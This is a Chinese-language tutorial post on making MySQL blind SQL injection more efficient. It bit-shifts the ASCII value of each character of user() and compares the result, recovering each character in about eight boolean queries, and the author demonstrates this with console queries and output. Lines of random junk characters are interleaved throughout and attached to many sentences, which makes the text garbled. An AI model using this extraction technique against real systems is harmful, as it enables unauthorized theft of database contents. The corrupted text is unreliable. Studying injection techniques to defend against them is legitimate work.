关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
9 {7 H! `2 M7 E% N; v4 e# P9 H8 s
- j/ G! c4 `7 P1 O

, r) C  k9 n" F- N# y) x( l下面将以查询mysql数据库当中user()的第一位为例:


0 y! D, o6 S' w! x. D
ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

% ]+ A% s+ ~5 U. s

首先执行如下sql语句:
1 a$ {/ D- U5 C: l/ P  t0 R
, N) D# k3 a4 f
1 W* k7 s1 y  e/ b& T
mysql> select (ascii((substr(user(),1,1))) >> 7)=0;


6 B. T2 p- b' z, a
2 F( ^1 T) ^- e9 p4 L9 C$ V9 q我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

' I! K' Z5 Y. \3 N3 _5 H
, h! L" p0 z& d5 ]4 K% g- {
$ `# p, x# \2 L& d6 p( a4 e第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
! {8 L9 N& n; y
8 T' B! k2 w  `0 g5 [& r

如果运算结果为1,说明第一位为0,不为1
) E5 w; P2 Y# W# d& ^6 L
+ d  r7 S2 `5 t! G- [: b  I
; H' e4 `/ ~5 ~0 v  }+ }7 X" j& U
+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |

& f: M7 E) r1 t2 Y% N, E7 w  E+————————————–+
: ]' J7 [/ i: N, v
; M) T# W( }0 Y| 1 |
; n- A) p% J# d# _& `: u# g/ Z
9 A  U/ S' {- ~' R+————————————–+
) R5 d. k9 T+ c1 y) L3 j$ s  \+ P1 g) j
1 row in set (0.00 sec)
$ y; z: y- T  a3 b8 I
这样我们就确定这个8bit的ascii的第一位为0

' L0 S2 {9 L! |* Z; {
. J/ _  ?" L/ ~+ S8 B2 G
9 o' g) f3 w% k8 ]( H' d0 I第二次我们来做6次右偏移来确定前两位

7 C2 D- [  m2 L& }# C9 Y: V. ~% Z
& S' s- b, J9 T; R, `: K6 q7 X  ]
前两位可能是01或00,即依然可以与0做比较,

- k; Z0 K, N/ h. y8 U3 K2 Y" n! zmysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+
- U  b2 P# X- z# ]' P* |3 I
| (ascii((substr(user(),1,1))) >> 6)=0 |
, I# T7 H5 B) D" h  O  B  @
0 m& D% G0 j# p+————————————–+
# Q1 i) Z- i$ Y
' W0 ~9 t; s8 k1 ~| 0 |

+————————————–+

1 row in set (0.00 sec)
* y- O2 j) R( k- m

7 r0 n2 z$ G( D
结果为0,即第二位为1
5 t# r, _& V- P, ]. f& e4 R' _+ t


开始猜测前三位为010或011
6 E2 O2 [$ i: f: C+ I
( n8 q2 r0 \  L1 E. }* |
6 a8 n5 I- Y, Y& B0 W; f
' R& }5 |7 M! n5 \让我们看看010和011的ascii码是多少


$ Q$ ~; L7 n; k1 N3 {4 r: q
5 z4 @& ^' L% r+ r* ?* F分别查询select b’011′ select b’010′

9 X# N$ y; h, X! z4 Y- F

! W3 F) E8 b% K8 z9 l* V获得结果 010 = 2 011 = 3


, p: c' u5 Z* N# {+ g2 ~
% `+ h+ }, ?! G1 T- s执行如下sql:


7 y) L% F2 K# e' _5 ^  K
mysql> select (ascii((substr(user(),1,1))) >> 5)=2;

+————————————–+
/ ^4 Z( G" Z! [7 a! p
| (ascii((substr(user(),1,1))) >> 5)=2 |
% J1 ~5 n! C( T
+————————————–+

| 0 |
' q- _5 h# {8 o6 R( e- C
+————————————–+

即前三位不为010,而是011
. @- z& _  O: x) s. g9 b


+ v0 X, n% Z9 G. j直到获得最后一位

- [* z/ }7 o1 c( j& n& L7 }7 U$ U

4 K; E% y0 ^7 s& E最终结果为:01110010
+ M/ k! m; L6 r- `  V; R" m: R

( g3 n% v* F( b# U
( _; Q9 g: w! U转换一下:
  E4 q# H. Y$ h; S8 g( Y

% |6 ?+ j2 g. }7 z
2 x$ y: t2 u7 `4 j+ Eselect b’01110010′



' T9 z3 B/ a! o& f  R. Y# ]' n查询结果
4 l) Q, E, U/ r
7 V# z. {( A' l' a: L$ n4 d. j
5 l6 \0 d3 f2 L$ [  V$ {
$ @+ A1 @5 P: ~$ b, K, |+————-+

| b’01110010′ |

& e# K( t' e5 _- y8 K2 d! O+————-+
, ~4 R+ Z  c0 F/ u3 ?
| r |
& m- l- H2 T  e( M
+————-+
. ^5 w3 r# c9 |& }! |1 e, k5 I
1 row in set (0.00 sec)


. I/ c# w/ o% `2 I* b/ d4 G2 p
这样我们就获得了user()的第一位.其它位依此类推
& ^6 W$ x/ a: ^! L) u9 b